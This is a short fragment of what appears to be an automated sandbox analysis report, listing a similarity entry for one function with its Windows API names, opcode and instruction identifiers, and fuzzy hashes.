                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0
                                        • Opcode ID: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
                                        • Instruction ID: 6224e523b18aba5be362eaca93d7d04149ef311f73b073555fcbd801f46ec3cb
                                        • Opcode Fuzzy Hash: 57b21f4120e00b08a3941e9ed4e610408d9ca53935617fe6296070accebd3829
                                        • Instruction Fuzzy Hash: 68F0C232604458AFC712DBA4CC40D9EBBA8EF46350B2541A5E800F7251D234EE019FA9